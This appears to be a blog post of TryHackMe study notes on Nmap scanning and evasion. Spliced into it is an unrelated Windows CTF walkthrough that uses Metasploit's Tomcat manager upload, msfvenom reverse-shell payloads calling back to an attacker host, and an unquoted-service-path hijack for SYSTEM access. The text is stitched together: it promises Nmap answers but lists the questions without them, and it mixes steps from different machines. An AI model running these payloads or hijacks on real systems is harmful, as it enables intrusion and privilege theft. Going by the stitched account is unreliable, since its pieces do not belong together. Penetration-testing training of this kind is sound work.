Summary

In this post, we covered Nmap scanning commands and techniques from beginner to advanced. We explained the TCP connect scan, stealth scan, UDP scan, ACK scan, decoy scan, fragmented scan, etc. This was part of the TryHackMe Junior Penetration Tester pathway.

This post covers the answers for

  1. Nmap Live Host Discovery
  2. Nmap Basic Port Scans
  3. Nmap Advanced Port Scans
  4. Nmap Post Port Scans

Challenge Description

When we want to target a network, we want to find an efficient tool to help us handle repetitive tasks and answer the following questions:

  1. Which systems are up?
  2. What services are running on these systems?

The tool that we will rely on is Nmap. The first question about finding live computers is answered in this room. This room is the first in a series of four rooms dedicated to Nmap. The second question about discovering running services is answered in the next Nmap rooms that focus on port-scanning.

Initial Reconnaissance and Web Exploitation

I started by running an Nmap scan to identify open ports on the target machine. My scan revealed several open ports, including 80 (HTTP), 135 (RPC), 139 (NetBIOS), 445 (SMB), and 8080 (HTTP). The presence of ports 135, 139, and 445 immediately told me it was a Windows machine.

I then navigated to the website on port 80, which was a static page. However, when I checked port 8080, I found a web server running Apache Tomcat/8.5.31. This was a promising lead! I noticed that the default Tomcat page was displayed, which often includes a “Manager App” link.

I tried to access the /manager/html directory, but it required authentication. This is a common scenario, so I decided to look for default credentials or vulnerabilities in Tomcat. I remembered that Tomcat versions can sometimes be vulnerable to specific exploits.

I used Metasploit’s exploit/multi/http/tomcat_mgr_upload module to try and gain access. This module attempts to upload a malicious .war file (Web Application Archive) to the Tomcat Manager. I set the RHOSTS to the target IP, RPORT to 8080, and LHOST to my attacking machine’s IP. I also needed to set LPORT for my reverse shell. After running the exploit, it successfully uploaded the .war file and gave me a meterpreter session!

  • Commands in Metasploit:
    • use exploit/multi/http/tomcat_mgr_upload
    • set RHOSTS <TARGET_IP>
    • set RPORT 8080
    • set LHOST <YOUR_IP>
    • set LPORT 4444 (or any chosen port)
    • exploit

Initial Foothold and User Flag

Once I had the meterpreter session, I could interact with the compromised system. I used the shell command to drop into a Windows command prompt.

  • Command in Meterpreter:
    • shell

From the command prompt, I wanted to find the user flag. I navigated to the Users directory and then to the bill user’s desktop.

  • Commands in Windows Shell:
    • cd Users
    • cd bill
    • cd Desktop
    • type user.txt (This command is used to display the contents of user.txt, revealing the user flag.)

Privilege Escalation

Now that I had the user flag, my next objective was to escalate privileges to administrator. I needed to find a vulnerability that would allow me to move from the bill user to a higher-privileged account.

I used systeminfo to gather information about the system, specifically the OS version and installed hotfixes.

  • Command in Windows Shell:
    • systeminfo

I then transferred winPEAS.exe (a privilege escalation enumeration tool) to the target machine using the upload command in Meterpreter.

  • Command in Meterpreter:
    • upload /path/to/your/winPEAS.exe C:\\Users\\bill\\Desktop\\winPEAS.exe

After running winPEAS.exe on the target, it highlighted a potential vulnerability related to unquoted service paths. This is a common issue where a service executable’s path isn’t enclosed in quotes, allowing an attacker to inject their own executable if they can write to a directory within that path.

  • Command in Windows Shell (to run winPEAS):
    • C:\Users\bill\Desktop\winPEAS.exe

I identified the AdvancedSystemCareService9 as having an unquoted path. Its path was C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe. This meant I could potentially place a malicious executable named Program.exe in C:\Program Files (x86)\IObit\ and it would be executed when the service started.
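The check that winPEAS performed here can be reproduced on the defensive side. The following is an added example (not code from the original write-up, from winPEAS or from Windows) that takes service ImagePath values as they would be read from HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath (or shown by `sc qc <name>`), flags the ones that are unquoted and contain a space, and produces the corrected quoted value. The service names and paths other than the AdvancedSystemCareService9 path from the write-up are constructed sample data.

```python
# Added example (not from the original write-up, winPEAS or Windows): the
# unquoted-service-path check from a defender's side, on constructed data.
import re
from typing import Dict, Tuple

# Constructed sample of service ImagePath values. The first is the path the
# write-up above identified; the rest are typical well-formed values.
SAMPLE_IMAGE_PATHS: Dict[str, str] = {
    "AdvancedSystemCareService9": r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe",
    "Spooler": r"C:\WINDOWS\System32\spoolsv.exe",
    "wuauserv": r"C:\WINDOWS\system32\svchost.exe -k netsvcs -p",
    "VendorAgent": r'"C:\Program Files\Vendor\Agent\agent.exe" --service',
    "LegacyAgent": r"C:\Program Files\Legacy Agent\agent.exe /run",
    "ExampleDriver": r"\SystemRoot\System32\drivers\example.sys",
}

# Executable part (up to the first '.exe' that is followed by whitespace or the
# end of the string), then optional arguments.
_EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def split_image_path(image_path: str) -> Tuple[str, str, bool]:
    """Return (executable, arguments, was_quoted) for a service ImagePath."""
    value = image_path.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        if end == -1:
            raise ValueError(f"unterminated quote in ImagePath: {image_path!r}")
        return value[1:end], value[end + 1:].strip(), True
    match = _EXE_RE.match(value)
    if match is None:  # drivers and other non-.exe images: no argument split
        return value, "", False
    return match.group(1), (match.group(2) or "").strip(), False


def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the service manager would parse the path ambiguously:
    no surrounding quotes and at least one space in the executable path."""
    executable, _, quoted = split_image_path(image_path)
    return not quoted and " " in executable


def quoted_image_path(image_path: str) -> str:
    """The corrected ImagePath (executable in quotes, arguments untouched).
    Values that are already safe are returned unchanged."""
    executable, arguments, quoted = split_image_path(image_path)
    if quoted or " " not in executable:
        return image_path.strip()
    return f'"{executable}" {arguments}'.strip()


def find_unquoted_services(image_paths: Dict[str, str]) -> Dict[str, str]:
    """Map each affected service name to the ImagePath value it should be set to."""
    return {name: quoted_image_path(path)
            for name, path in image_paths.items()
            if is_unquoted_with_spaces(path)}


if __name__ == "__main__":
    for name, fixed in find_unquoted_services(SAMPLE_IMAGE_PATHS).items():
        print(f"{name}: set ImagePath to {fixed}")
```

The finding only matters when a non-administrator can write to one of the directories along the path, so a review pairs this check with `icacls` on those directories. The fix is to quote the executable path in the service configuration (for example with `sc config <service> binPath=` and the quoted value), which removes the ambiguity regardless of directory permissions.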

I generated a malicious .exe payload using msfvenom to get a reverse shell as a higher-privileged user.

  • Command in Kali Linux:
    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=5555 -f exe -o Program.exe

I then uploaded this Program.exe to C:\Program Files (x86)\IObit\ on the target machine using Meterpreter’s upload command.

  • Command in Meterpreter:
    • upload /path/to/your/Program.exe "C:\\Program Files (x86)\\IObit\\Program.exe"

Before restarting the service, I set up a new multi/handler in Metasploit to catch the incoming shell from my malicious Program.exe.

  • Commands in Metasploit:
    • use exploit/multi/handler
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • set LHOST <YOUR_IP>
    • set LPORT 5555
    • exploit

Finally, I restarted the AdvancedSystemCareService9 service. This caused my Program.exe to execute, and I caught a new meterpreter session, this time as NT AUTHORITY\SYSTEM (full administrator privileges)!

  • Command in Windows Shell (to restart service):
    • sc stop AdvancedSystemCareService9
    • sc start AdvancedSystemCareService9

Root Flag Retrieval

With full system access, I could now retrieve the root flag. I navigated to the Administrator’s desktop.

  • Commands in new Meterpreter session:
    • shell
    • cd C:\Users\Administrator\Desktop
    • type root.txt (This command displayed the contents of root.txt, revealing the root flag.)

This challenge was a great exercise in combining web exploitation with Windows privilege escalation techniques.

I just finished watching a video that dives deep into Nmap scanning techniques, revisiting the Junior Penetration Tester pathway on TryHackMe. I focused on the practical commands and concepts rather than just the theory. Here’s a breakdown of what I covered:

Nmap Scanning Techniques

TCP Connect Scan (-sT)

This is the default scan type if I’m not running as root. It completes the full TCP three-way handshake, making it easily detectable by firewalls and administrators. It doesn’t require elevated privileges.

  • Command: nmap -sT [IP_ADDRESS]

Stealth Scan / SYN Scan (-sS)

This scan requires root privileges. It’s considered stealthier because it doesn’t complete the full TCP handshake. Instead, after receiving a SYN-ACK, it sends a RST packet to tear down the connection.

  • Command: sudo nmap -sS [IP_ADDRESS]

UDP Scan (-sU)

I use this to scan UDP ports. It’s trickier to determine port status with UDP because it’s connectionless. If a port is closed, the target usually responds with an ICMP “port unreachable” message. If there’s no response, the port is considered open or filtered.

  • Command: nmap -sU [IP_ADDRESS] or nmap -sU -F [IP_ADDRESS] (for a faster scan of common ports).

Timing (-T)

This option controls the speed of the scan. Options range from -T0 (paranoid, very slow for IDS/firewall evasion) to -T5 (insane, very fast and noisy). I can also use --min-rate and --max-rate to control packets per second.

Null Scan (-sN)

This sends TCP packets with no flags set. If a port is open or filtered, there’s no response. If it’s closed, the target sends a RST packet.

  • Command: nmap -sN [IP_ADDRESS]

FIN Scan (-sF)

Similar to a Null scan, this sends TCP packets with only the FIN flag set. It behaves similarly in terms of responses for open/filtered and closed ports.

  • Command: nmap -sF [IP_ADDRESS]

Xmas Scan (-sX)

This sends TCP packets with FIN, PSH, and URG flags set. Like Null and FIN scans, its behavior helps in understanding firewall rules.

  • Command: nmap -sX [IP_ADDRESS]

ACK Scan (-sA)

I use this to map out firewall rule sets by sending TCP packets with only the ACK flag set. The target should always respond with a RST packet. Nmap considers a port “unfiltered” if a RST is received, and “filtered” if no response comes back.

  • Command: nmap -sA [IP_ADDRESS]

Window Scan (-sW)

Similar to the ACK scan, this can sometimes differentiate open ports from closed ones by examining the TCP window field in the returned RST packet.

  • Command: nmap -sW [IP_ADDRESS]

Custom TCP Scan Flags (--scanflags)

This allows me to specify custom TCP flags. For example, to set only the RST flag:

  • Command: nmap --scanflags RST [IP_ADDRESS]
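The Null, FIN, Xmas, ACK, Window and custom-flag scans above differ only in which bits of the TCP flags byte the probe sets and in how Nmap reads the reply. The following added example (my code, not from the original post or from the Nmap project) encodes those probe flags, parses a --scanflags value, counts the flags set, and returns the port state Nmap assigns for a given reply. It also covers the Maimon scan (-sM, FIN+ACK) that the room's questions mention. On the defensive side, the same table is what you would use to label an unusual probe seen in a packet capture.

```python
# Added example (not from the original post or from Nmap): the TCP flag
# combinations behind the scan types above, plus how Nmap reads the reply.
from typing import Dict, Optional

# Flag bits as laid out in the TCP header flags byte (ECE/CWR are the two
# ECN bits, which --scanflags also accepts).
FIN, SYN, RST, PSH, ACK, URG, ECE, CWR = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80
FLAG_BITS: Dict[str, int] = {"FIN": FIN, "SYN": SYN, "RST": RST, "PSH": PSH,
                             "ACK": ACK, "URG": URG, "ECE": ECE, "CWR": CWR}

# Flags set in the probe each scan type sends (Maimon, -sM, is FIN+ACK).
SCAN_PROBES: Dict[str, int] = {
    "null": 0, "fin": FIN, "xmas": FIN | PSH | URG, "maimon": FIN | ACK,
    "ack": ACK, "window": ACK, "syn": SYN,
}


def flags_from_scanflags(spec: str) -> int:
    """Parse a --scanflags value: a number, or flag names run together ('FINPSHURG')."""
    spec = spec.strip().upper()
    if spec.isdigit():
        return int(spec) & 0xFF
    if len(spec) % 3:
        raise ValueError(f"unrecognised --scanflags value: {spec!r}")
    value = 0
    for i in range(0, len(spec), 3):
        token = spec[i:i + 3]
        if token not in FLAG_BITS:
            raise ValueError(f"unknown TCP flag {token!r} in --scanflags")
        value |= FLAG_BITS[token]
    return value


def flag_names(flags: int) -> str:
    """Render a flags byte as e.g. 'FIN,PSH,URG' ('' for a null probe)."""
    return ",".join(name for name, bit in FLAG_BITS.items() if flags & bit)


def count_flags(flags: int) -> int:
    """Number of flags set to 1, the quantity the room's questions ask about."""
    return bin(flags & 0xFF).count("1")


def classify_probe(flags: int) -> Optional[str]:
    """Name the scan whose probe carries exactly these flags (None if no match).
    ACK and Window probes are identical on the wire, so a bare ACK reports 'ack'."""
    for name, probe in SCAN_PROBES.items():
        if probe == flags:
            return name
    return None


def nmap_state(scan: str, response: str) -> str:
    """Port state Nmap assigns from one reply to the named scan's probe.
    response is 'SYN/ACK', 'RST', 'ICMP unreachable' or 'none' (no reply)."""
    if scan in ("null", "fin", "xmas", "maimon"):
        # RFC 793: closed ports answer with RST, open ports drop these probes.
        table = {"RST": "closed", "none": "open|filtered", "ICMP unreachable": "filtered"}
    elif scan in ("ack", "window"):
        # Any reachable port answers a stray ACK with RST; -sW additionally
        # inspects the RST's window field to split 'unfiltered' into open/closed.
        table = {"RST": "unfiltered", "none": "filtered", "ICMP unreachable": "filtered"}
    elif scan == "syn":
        table = {"SYN/ACK": "open", "RST": "closed", "none": "filtered",
                 "ICMP unreachable": "filtered"}
    else:
        raise ValueError(f"unknown scan type {scan!r}")
    return table.get(response, "unexpected")


if __name__ == "__main__":
    for name, probe in SCAN_PROBES.items():
        print(f"{name:7s} flags={flag_names(probe) or '(none)':12s} "
              f"set={count_flags(probe)} no-reply -> {nmap_state(name, 'none')}")
```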

Firewall Evasion Techniques

I explored several ways to evade firewalls:

  • Fragmentation (-f, -ff): Splits the probe into small IP fragments so that the TCP header is spread across several packets. -f uses 8-byte fragments, -ff uses 16-byte fragments.
    • Command: nmap -sS -T1 -f [IP_ADDRESS]
    • Command: nmap -ff [IP_ADDRESS]
  • Decoy Scan (-D): Makes the scan appear to originate from multiple IP addresses.
    • Command: nmap -D RND:10 [IP_ADDRESS] (uses 10 random IPs)
    • Command: nmap -D decoy_ip1,decoy_ip2,ME [IP_ADDRESS] (ME represents my actual IP)
  • Spoof Source IP (-S): Makes the scan appear to come from a single, specific spoofed IP. This requires being on the same network or using a sniffer on the spoofed host to see results.
    • Command: nmap -e [INTERFACE] -Pn -S spoofed_ip [TARGET_IP]
  • Spoof MAC Address (--spoof-mac): Used to change the source MAC address.
  • Source Port Specification (--source-port or -g): Specifies the source port Nmap uses.
  • Idle Scan (-sI): A very stealthy scan that bounces off a “zombie” host.
  • Changing User Agent (--script-args http.useragent="USER_AGENT_STRING"): Can be used with HTTP scripts to change the user agent.
    • Command: nmap -sV --script http-headers --script-args http.useragent="Googlebot" [IP_ADDRESS]

Service and OS Detection

  • Service Version Detection (-sV): Attempts to determine the version of services running on open ports. It completes the TCP three-way handshake, so it doesn’t work with stealth scans (-sS) by default. I can control its intensity with --version-intensity [0-9] or use --version-light.
    • Command: nmap -sV [IP_ADDRESS]
  • OS Detection (-O): Attempts to identify the operating system of the target by fingerprinting its TCP/IP stack characteristics.
    • Command: nmap -O [IP_ADDRESS]

Nmap Scripting Engine (NSE)

The Nmap Scripting Engine (NSE) uses Lua scripts to extend Nmap’s functionality for tasks like vulnerability scanning, brute-forcing, and advanced discovery. Scripts are located in /usr/share/nmap/scripts/.

  • Default scripts (-sC or --script default): Runs a safe set of default scripts.
    • Command: nmap --script default [IP_ADDRESS]
    • Command: nmap -sC [IP_ADDRESS]
  • Specific script: I can run a specific script by name.
    • Example: nmap --script ssh2-enum-algos [IP_ADDRESS]
  • I used ls /usr/share/nmap/scripts/ | grep robots to find a script related to robots.txt and ls /usr/share/nmap/scripts/ | grep 2020-0712 for a specific CVE.

Saving Output

Finally, I learned how to save Nmap’s output in various formats:

  • Normal format (-oN): Human-readable.
    • Command: nmap -sV [IP_ADDRESS] -oN output.nmap
  • Grepable format (-oG): Easy to parse with tools like grep.
    • Command: nmap -sV [IP_ADDRESS] -oG output.gnmap
    • I used cat scans.gnmap | grep https and cat scans.gnmap | grep 8089 to filter results.
  • XML format (-oX): Useful for processing with other programs.
    • Command: nmap -sV [IP_ADDRESS] -oX nmap.xml
  • All formats (-oA): Saves in all three formats using the same base filename.
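The grep commands above work because each host in the grepable format is one tab-separated line, with every port written as port/state/proto/owner/service/rpcinfo/version. The following added example (my code, not from the original post or from Nmap) parses that format properly instead of grepping it, so a service name or port number can be matched on the right field; it answers the two questions the room asks about the attached logs (systems listening on HTTPS, the system with port 8089 open). The scan output it runs on is a constructed sample, not real scan data.

```python
# Added example (not from the original post or from Nmap): a small parser for
# Nmap's grepable (-oG) output, run over constructed sample lines.
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample in -oG layout: comment lines, a "Status" line and a
# "Ports" line per host, fields separated by tabs.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated (constructed sample, not real scan output)
Host: 10.10.1.10 ()\tStatus: Up
Host: 10.10.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.2p1/, 80/open/tcp//http//nginx 1.18.0/, 443/open/tcp//https//nginx 1.18.0/\tIgnored State: closed (997)
Host: 10.10.1.20 (print01)\tStatus: Up
Host: 10.10.1.20 (print01)\tPorts: 8089/open/tcp//unknown///, 9100/open/tcp//jetdirect///\tIgnored State: filtered (998)
Host: 10.10.1.30 ()\tStatus: Up
Host: 10.10.1.30 ()\tPorts: 443/open/tcp//ssl|https//Apache httpd 2.4.41/, 8443/closed/tcp//https-alt///\tIgnored State: closed (998)
# Nmap done -- 3 IP addresses (3 hosts up) scanned in 12.34 seconds
"""


@dataclass
class PortRecord:
    port: int
    state: str
    proto: str
    service: str   # e.g. 'https' or 'ssl|https' (tunnel|service)
    version: str


def parse_gnmap(text: str) -> Dict[str, List[PortRecord]]:
    """Map each scanned IP to the port records listed for it."""
    hosts: Dict[str, List[PortRecord]] = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and anything that is not a host record
        fields: Dict[str, str] = {}
        for chunk in line.split("\t"):
            key, _, value = chunk.partition(": ")
            fields[key] = value
        ip = fields["Host"].split()[0]  # "10.10.1.20 (print01)" -> "10.10.1.20"
        records = hosts.setdefault(ip, [])
        ports = fields.get("Ports")
        if not ports:
            continue  # "Status: Up" lines carry no port list
        for entry in ports.split(", "):
            # port/state/proto/owner/service/rpcinfo/version/ (trailing slash)
            parts = entry.split("/")
            if len(parts) < 7:
                raise ValueError(f"malformed port entry: {entry!r}")
            records.append(PortRecord(int(parts[0]), parts[1], parts[2], parts[4], parts[6]))
    return hosts


def _ip_key(ip: str):
    return tuple(int(octet) for octet in ip.split("."))


def hosts_with_service(hosts: Dict[str, List[PortRecord]], name: str, state: str = "open") -> List[str]:
    """IPs with a port in the given state whose service (or tunnelled service) is `name`."""
    return sorted((ip for ip, recs in hosts.items()
                   if any(r.state == state and name in r.service.split("|") for r in recs)),
                  key=_ip_key)


def hosts_with_port(hosts: Dict[str, List[PortRecord]], port: int, state: str = "open") -> List[str]:
    """IPs on which the given port number is in the given state."""
    return sorted((ip for ip, recs in hosts.items()
                   if any(r.port == port and r.state == state for r in recs)),
                  key=_ip_key)


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    print("HTTPS listeners:", hosts_with_service(scan, "https"))
    print("Port 8089 open on:", hosts_with_port(scan, 8089))
```

Matching on the service field rather than on the whole line avoids the false hits a bare `grep https` produces (a version string or hostname containing the text, or the https-alt entry above), and matching the port number as an integer avoids `grep 8089` hitting 18089 or a version string.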

I’ll be moving on to the “Protocols and Servers” rooms next to complete the Junior Penetration Tester track!

TryHackMe Nmap Answers

How many devices can see the ARP Request?

Did computer6 reply to the ARP Request? (Y/N)

What is the first IP address Nmap would scan if you provided 10.10.12.13/29 as your target?

How many IP addresses will Nmap scan if you provide the following range 10.10.0-255.101-125?
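The two target-specification questions above come down to how Nmap expands its target syntax. The following added example (my code, not from the original post or from Nmap) expands both forms, CIDR notation and per-octet ranges, into the address set and returns the first address and the count. It goes slightly beyond the two questions in that it also handles comma-separated octet lists and the `*` wildcard.

```python
# Added example (not from the original post or from Nmap): expand Nmap-style
# IPv4 target specifications into the address set that would be scanned.
import ipaddress
from itertools import product
from typing import Iterator, List


def octet_values(token: str) -> List[int]:
    """Expand one octet of a target: '13', '0-255', '101-125', '1,3,5-7' or '*'."""
    if token == "*":
        return list(range(256))
    values: List[int] = []
    for part in token.split(","):
        if "-" in part:
            lo_s, hi_s = part.split("-", 1)
            lo = int(lo_s) if lo_s else 0      # an omitted bound means 0 ...
            hi = int(hi_s) if hi_s else 255    # ... or 255, as with Nmap's bare '-'
        else:
            lo = hi = int(part)
        if not 0 <= lo <= hi <= 255:
            raise ValueError(f"invalid octet range {part!r}")
        values.extend(range(lo, hi + 1))
    return values


def expand_target(spec: str) -> Iterator[str]:
    """Yield every IPv4 address covered by spec, in ascending order.

    CIDR targets include the network and broadcast addresses, as Nmap does:
    10.10.12.13/29 therefore covers 10.10.12.8 through 10.10.12.15.
    """
    if "/" in spec:
        network = ipaddress.ip_network(spec, strict=False)  # host bits are masked off
        for address in network:
            yield str(address)
        return
    octets = spec.split(".")
    if len(octets) != 4:
        raise ValueError(f"not an IPv4 target spec: {spec!r}")
    for combo in product(*(octet_values(octet) for octet in octets)):
        yield ".".join(str(n) for n in combo)


def first_target(spec: str) -> str:
    """Lowest address covered by the spec."""
    return next(expand_target(spec))


def target_count(spec: str) -> int:
    """Number of addresses the spec covers."""
    return sum(1 for _ in expand_target(spec))


if __name__ == "__main__":
    for spec in ("10.10.12.13/29", "10.10.0-255.101-125"):
        print(f"{spec}: first {first_target(spec)}, {target_count(spec)} addresses")
```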

Send a packet with the following:

  • From computer1
  • To computer3
  • Packet Type: “Ping Request”

What is the type of packet that computer1 sent before the ping?

What is the type of packet that computer1 received before being able to send the ping?

How many computers responded to the ping request?

Send a packet with the following:

  • From computer2
  • To computer5
  • Packet Type: “Ping Request”

What is the name of the first device that responded to the first ARP Request?

What is the name of the first device that responded to the second ARP Request?

Send another Ping Request. Did it require new ARP Requests? (Y/N)

We will be sending broadcast ARP Requests packets with the following options:


  • From computer1
  • To computer1 (to indicate it is broadcast)
  • Packet Type: “ARP Request”
  • Data: try all the possible eight devices (other than computer1) in the network: computer2, computer3, computer4, computer5, computer6, switch1, switch2, and router.

How many devices are you able to discover using ARP requests?

What is the option required to tell Nmap to use ICMP Timestamp to discover live hosts?

What is the option required to tell Nmap to use ICMP Address Mask to discover live hosts?

What is the option required to tell Nmap to use ICMP Echo to discover live hosts?

Which TCP ping scan does not require a privileged account?

Which TCP ping scan requires a privileged account?

What option do you need to add to Nmap to run a TCP SYN ping scan on the telnet port?

We want Nmap to issue a reverse DNS lookup for all the possible hosts on a subnet, hoping to get some insights from the names. What option should we add?

Which service uses UDP port 53 by default?

Which service uses TCP port 22 by default?

How many port states does Nmap consider?

Which port state is the most interesting to discover as a pentester?

What 3 letters represent the Reset flag?

Which flag needs to be set when you initiate a TCP connection (first packet of TCP 3-way handshake)?

Launch the VM. Open the AttackBox and execute nmap -sT MACHINE_IP via the terminal. A new service has been installed on this VM since our last scan. Which port number was closed in the scan above but is now open on this target VM?

What is Nmap’s guess about the newly installed service?

Launch the VM. Some new server software has been installed since the last time we scanned it. On the AttackBox, use the terminal to execute nmap -sS MACHINE_IP. What is the new open port?

What is Nmap’s guess of the service name?

Launch the VM. On the AttackBox, use the terminal to execute nmap -sU -F -v MACHINE_IP. A new service has been installed since the last scan. What is the UDP port that is now open?

What is the service name according to Nmap?

What is the option to scan all the TCP ports between 5000 and 5500?

How can you ensure that Nmap will run at least 64 probes in parallel?

What option would you add to make Nmap very slow and paranoid?

In a null scan, how many flags are set to 1?

In a FIN scan, how many flags are set to 1?

In a Xmas scan, how many flags are set to 1?

Start the VM and load the AttackBox. Once both are ready, open the terminal on the AttackBox and use nmap to launch a FIN scan against the target VM. How many ports appear as open|filtered?

Repeat your scan launching a null scan against the target VM. How many ports appear as open|filtered?

In the Maimon scan, how many flags are set?

In TCP Window scan, how many flags are set?

You decided to experiment with a custom TCP scan that has the reset flag set. What would you add after --scanflags?

The VM received an update to its firewall ruleset. A new port is now allowed by the firewall. After you make sure that you have terminated the VM from Task 2, start the VM for this task. Launch the AttackBox if you haven’t done that already. Once both are ready, open the terminal on the AttackBox and use Nmap to launch an ACK scan against the target VM. How many ports appear unfiltered?

What is the new port number that appeared?

Is there any service behind the newly discovered port number? (Y/N)

What do you need to add to the command sudo nmap MACHINE_IP to make the scan appear as if coming from the source IP address 10.10.10.11 instead of your IP address?

What do you need to add to the command sudo nmap MACHINE_IP to make the scan appear as if coming from the source IP addresses 10.10.20.21 and 10.10.20.28 in addition to your IP address?

If the TCP segment has a size of 64, and -ff option is being used, how many IP fragments will you get?

You discovered a rarely-used network printer with the IP address 10.10.5.5, and you decide to use it as a zombie in your idle scan. What argument should you add to your Nmap command?

Launch the AttackBox if you haven’t done so already. After you make sure that you have terminated the VM from Task 4, start the VM for this task. Wait for it to load completely, then open the terminal on the AttackBox and use Nmap with nmap -sS -F --reason MACHINE_IP to scan the VM. What is the reason provided for the stated port(s) being open?

Start the target machine for this task and launch the AttackBox. Run nmap -sV --version-light MACHINE_IP via the AttackBox. What is the detected version for port 143?

Which service did not have a version detected with --version-light?

Run nmap with -O option against MACHINE_IP. What OS did Nmap detect?

Knowing that Nmap scripts are saved in /usr/share/nmap/scripts on the AttackBox. What does the script http-robots.txt check for?

Can you figure out the name for the script that checks for the remote code execution vulnerability MS15-034 (CVE-2015-1635)?

Launch the AttackBox if you haven’t already. After you ensure you have terminated the VM from Task 2, start the target machine for this task. On the AttackBox, run Nmap with the default scripts -sC against MACHINE_IP. You will notice that there is a service listening on port 53. What is its full version value?

Based on its description, the script ssh2-enum-algos “reports the number of algorithms (for encryption, compression, etc.) that the target SSH2 server offers.” What is the name of the key exchange algorithms (kex_algorithms) that relies upon “sha1” and is supported by MACHINE_IP?

Terminate the target machine of the previous task and start the target machine for this task. On the AttackBox terminal, issue the command scp pentester@MACHINE_IP:/home/pentester/* . to download the Nmap reports in normal and grepable formats from the target virtual machine.

Note that the username pentester has the password THM17577.

Check the attached Nmap logs. How many systems are listening on the HTTPS port?

What is the IP address of the system listening on port 8089?

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.